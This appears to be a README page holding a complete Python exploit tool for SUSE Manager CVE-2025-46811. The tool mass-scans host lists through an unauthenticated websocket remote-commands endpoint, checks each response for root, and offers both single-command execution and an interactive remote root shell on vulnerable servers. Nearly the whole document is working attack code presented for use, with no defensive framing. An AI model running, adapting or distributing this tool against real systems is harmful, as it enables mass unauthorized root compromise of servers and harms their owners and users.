README.md
Rendering markdown...
#!/usr/bin/env python3
import asyncio
import websockets
import ssl
import argparse
from concurrent.futures import ThreadPoolExecutor
from typing import List, Tuple, Optional
import logging
from colorama import Fore, Style, init
# Initialize colorama
init(autoreset=True)
class SUSEManagerExploiter:
"""SUSE Manager CVE-2025-46811 Exploitation Tool"""
def __init__(self, debug: bool = False):
self.ssl_context = ssl.create_default_context()
self.ssl_context.check_hostname = False
self.ssl_context.verify_mode = ssl.CERT_NONE
self.debug = debug
self._setup_logging()
def _setup_logging(self):
"""Configure debug logging"""
logging.basicConfig(
level=logging.DEBUG if self.debug else logging.INFO,
format=f'{Fore.CYAN}%(asctime)s{Style.RESET_ALL} - %(levelname)s - %(message)s',
handlers=[logging.StreamHandler()]
)
self.logger = logging.getLogger(__name__)
def _debug_print(self, message: str, level: str = "info"):
"""Enhanced debug output with colors"""
color = {
"debug": Fore.BLUE,
"info": Fore.GREEN,
"warning": Fore.YELLOW,
"error": Fore.RED,
"critical": Fore.RED + Style.BRIGHT
}.get(level.lower(), Fore.WHITE)
if self.debug or level != "debug":
print(f"{color}[{level.upper()}]{Style.RESET_ALL} {message}")
async def check_vulnerability(self, host: str, timeout: int = 5) -> Tuple[str, bool, str]:
"""Check if target is vulnerable"""
self._debug_print(f"Testing {host}", "debug")
try:
async with websockets.connect(
f"wss://{host}/rhn/websocket/minion/remote-commands",
ssl=self.ssl_context,
timeout=timeout,
extra_headers={"Origin": f"https://{host}"}
) as ws:
self._debug_print(f"Connected to {host}", "info")
await ws.send('id')
response = await asyncio.wait_for(ws.recv(), timeout=2)
self._debug_print(f"Received response: {response}", "debug")
if 'uid=0(root)' in response:
self._debug_print(f"{host} is vulnerable!", "info")
return (host, True, "Vulnerable - root access confirmed")
return (host, False, "Unexpected response format")
except Exception as e:
self._debug_print(f"Error checking {host}: {str(e)}", "error")
return (host, False, f"Error: {str(e)}")
async def execute_command(self, host: str, command: str, timeout: int = 10) -> str:
"""Execute commands on vulnerable hosts"""
self._debug_print(f"Executing: {command} on {host}", "debug")
try:
async with websockets.connect(
f"wss://{host}/rhn/websocket/minion/remote-commands",
ssl=self.ssl_context,
timeout=timeout,
extra_headers={"Origin": f"https://{host}"}
) as ws:
await ws.send(command)
response = await asyncio.wait_for(ws.recv(), timeout=timeout)
self._debug_print(f"Command output: {response}", "debug")
return response
except Exception as e:
error_msg = f"Command execution failed: {str(e)}"
self._debug_print(error_msg, "error")
return error_msg
async def batch_scan(self, hosts: List[str], max_workers: int = 10) -> List[Tuple[str, bool, str]]:
"""Concurrently scan multiple hosts"""
self._debug_print(f"Starting batch scan of {len(hosts)} hosts", "info")
tasks = [self.check_vulnerability(host) for host in hosts]
return await asyncio.gather(*tasks)
async def interactive_shell(self, host: str):
"""Start interactive RCE session"""
self._debug_print(f"Starting interactive session with {host}", "info")
print(f"{Fore.GREEN}[+] Connected to {host} (type 'exit' to quit){Style.RESET_ALL}")
while True:
try:
cmd = input(f"{Fore.YELLOW}remote-shell> {Style.RESET_ALL}")
if cmd.lower() in ('exit', 'quit'):
break
result = await self.execute_command(host, cmd)
print(f"{Fore.CYAN}{result}{Style.RESET_ALL}")
except KeyboardInterrupt:
self._debug_print("Session terminated by user", "warning")
break
except Exception as e:
print(f"{Fore.RED}[!] Error: {e}{Style.RESET_ALL}")
def main():
parser = argparse.ArgumentParser(description="SUSE Manager Vulnerability Scanner & Exploiter")
subparsers = parser.add_subparsers(dest='mode', required=True)
# Global arguments
parser.add_argument('--debug', action='store_true', help='Enable debug output')
# Scan mode
scan_parser = subparsers.add_parser('scan', help='Scan for vulnerable hosts')
scan_parser.add_argument('-i', '--input', required=True, help='Input file containing hosts (IP/Domain)')
scan_parser.add_argument('-o', '--output', help='Output file for vulnerable hosts')
scan_parser.add_argument('-t', '--threads', type=int, default=10, help='Concurrent threads')
# Exploit mode
exploit_parser = subparsers.add_parser('exploit', help='Execute commands on vulnerable host')
exploit_parser.add_argument('host', help='Target host (IP/Domain)')
exploit_parser.add_argument('-c', '--command', help='Single command to execute')
args = parser.parse_args()
exploiter = SUSEManagerExploiter(debug=args.debug)
if args.mode == 'scan':
with open(args.input) as f:
targets = [line.strip() for line in f if line.strip()]
exploiter._debug_print(f"Scanning {len(targets)} hosts...", "info")
results = asyncio.run(exploiter.batch_scan(targets, args.threads))
vulnerable = [host for host, is_vuln, _ in results if is_vuln]
for host, _, msg in results:
status = f"{Fore.GREEN}VULNERABLE{Style.RESET_ALL}" if host in vulnerable else f"{Fore.RED}SAFE{Style.RESET_ALL}"
print(f"{host}: {status} - {msg}")
if args.output and vulnerable:
with open(args.output, 'w') as f:
f.write("\n".join(vulnerable))
exploiter._debug_print(f"Vulnerable hosts saved to {args.output}", "info")
elif args.mode == 'exploit':
if args.command:
print(asyncio.run(exploiter.execute_command(args.host, args.command)))
else:
asyncio.run(exploiter.interactive_shell(args.host))
if __name__ == "__main__":
main()